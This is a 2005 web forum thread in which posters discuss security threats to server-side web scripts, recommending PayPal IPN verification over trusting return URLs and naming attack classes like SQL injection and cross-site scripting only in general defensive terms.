1. Advertising
    y u no do it?

    Advertising (learn more)

    Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

    Starts at just $1 per CPM or $0.10 per CPC.

What are the threats?

Discussion in 'Programming' started by wanboll, Sep 14, 2005.

  1. #1
    Hi all,

    I was just wondering. As someone had just pointed out. We should never Trust incoming post/get variables while coding server-side scripting...What are the other potential incoming hazards that we could face?
    SEMrush
    Another question is, We often use a return url in Paypal and Stormpay buttons right? Somewhere along the code is the return url and anyone with atleat half a kilo of grey(approx 1lb) matter can tell there's the return url....Go for it! Is there a way we can defend ourselves from that?
     
    wanboll, Sep 14, 2005 IP
    SEMrush
  2. TheHoff

    TheHoff Peon

    Messages:
    1,530
    Likes Received:
    130
    Best Answers:
    0
    Trophy Points:
    0
    #2
    Your server side processing of the transaction should verify that Paypal received the money.. going directly to the return URL is pointless as there will be no back-and-forth between your server and Paypal verifying the receipt. Try it yourself.. no harm in it. Properly coded, the return URL should check for Paypal's receipt and display a failure message. Even if it displays a success message, the data would not have been written in your db to indicate a successful transaction.
     
    TheHoff, Sep 14, 2005 IP
  3. wanboll

    wanboll Banned

    Messages:
    433
    Likes Received:
    29
    Best Answers:
    0
    Trophy Points:
    0
    #3
    Iv never tried it so not sure how its done but i read a load of posts a while ago about people doing it. S its not as easy as it sounds. Thats good to know.
     
    wanboll, Sep 14, 2005 IP
  4. iTISTIC

    iTISTIC Peon

    Messages:
    140
    Likes Received:
    9
    Best Answers:
    0
    Trophy Points:
    0
    #4
    A long while ago, a lot of sites were coded in such a way that if you requested their return URL it would mean you had finalized a purchase. This is obviously very poor programming, but it existed on a LOT of web sites.

    What you need to do is integrate with PayPal's IPN system so when a user does get to your return URL you can check to make sure they did indeed finalize a purchase before you provide them with whatever they purchased. PayPal has very good docs in their site for integration with IPN and I believe they have code samples as well for most of the common scripting languages.
     
    iTISTIC, Sep 14, 2005 IP
  5. J.D.

    J.D. Peon

    Messages:
    1,198
    Likes Received:
    64
    Best Answers:
    0
    Trophy Points:
    0
    #5
    * Cross-site scripting will allow the attacker to steal your customer's credentials and do whatever they do on your website.

    * SQL injection will allow the attacker to manipulate data in your database and in some cases to take over your machine

    * Ability to execute unauthorized binary code (e.g. getting to a command line interpreter) will allow the attacker to take over the machine

    * Ability to execute script code will allow the attacker to deface your website, disable your administrative credentials, figure out your machine's directory structure and configuration; If the scripting environment is poorly configured, the attacker can also take over the machine

    * Buffer overflow attacks will allow the attacker to crash your server and sometimes take over the machine

    Once the attacker took over your machine, s/he is like a kid in a candy store - they can reconfigure your and, sometimes, everybody else's web server to include their malicious content (e.g. adding a footer that points to their website that will try to slip malicious code to each user), they can send tons of spam until/if you figure out what's going on; they can take over the network to which the machine is attached; they can steal your customer's credentials, credit card info, etc (even if you don't store it locally); etc, etc, etc. You get the idea.

    J.D.
     
    J.D., Sep 14, 2005 IP
  6. michele

    michele Peon

    Messages:
    30
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    0
    #6
    Always write your code assuming that someone will try to break into your system using it, especially where credit cards and money is involved. Always narrow down what your script will accept to the narrowest workable range of data.

    Never rely on client side validation (Javascript) for anything. It is only useful for pre-validation to save the user time, nothing else.
     
    michele, Sep 20, 2005 IP
  7. GeorgeB.

    GeorgeB. Notable Member

    Messages:
    5,696
    Likes Received:
    288
    Best Answers:
    0
    Trophy Points:
    280
    #7
    Google search "php security"

    The answers await you...
     
    GeorgeB., Sep 20, 2005 IP